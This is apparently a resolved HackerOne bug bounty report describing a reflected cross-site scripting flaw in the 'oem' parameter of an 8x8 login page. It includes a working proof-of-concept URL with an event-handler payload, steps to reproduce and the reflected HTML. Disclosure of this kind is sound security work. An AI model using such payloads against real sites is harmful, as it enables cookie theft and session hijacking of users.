xss(r) vcc-na11.8x8.com
Medium
Vulnerability Details
xss(r) on vcc-na11.8x8.com oem parameter
"oem" parameter in endpoint vcc-na11.8x8.com is not sanitized and is pen to Reflected Cross Site Scripting Attacks
https://vcc-na11.8x8.com/CM/login.php?oem=%22onpointermove%3Dprompt%281%29+class%3Dss11+
**Description:** [add more details about this vulnerability]
xss(r) on vcc-na11.8x8.com oem parameter
"oem" parameter in endpoint vcc-na11.8x8.com is not sanitized and is pen to Reflected Cross Site Scripting Attacks
Specifically stealing non secure cookies
## Steps To Reproduce:
(Add details for how we can reproduce the issue)
1. Click on link
https://vcc-na11.8x8.com/CM/login.php?oem=%22onpointermove%3Dprompt%281%29+class%3Dss11+
2. Move mouse over body
3. xss is trigerred
## Supporting Material/References:
The payload is reflected multiple places in response body
<a href=" http://www.google.com/chrome">
<img src="/./OEM/"onpointermove=prompt(1)class=ss11/common/images/browsers/chrome.png"class="browser-logo" alt="{{#txt_unsupported_browser_chrome#}}" />
<h2>{{#txt_unsupported_browser_chrome#}}</h2>
From <https://vcc-na11.8x8.com/CM/login.php?oem=%22onpointermove%3Dprompt%281%29+class%3Dss11+>
## Impact
Cookie stealing
Actions
View on HackerOneReport Stats
- Report ID: 1392733
- State: Closed
- Substate: resolved
- Upvotes: 5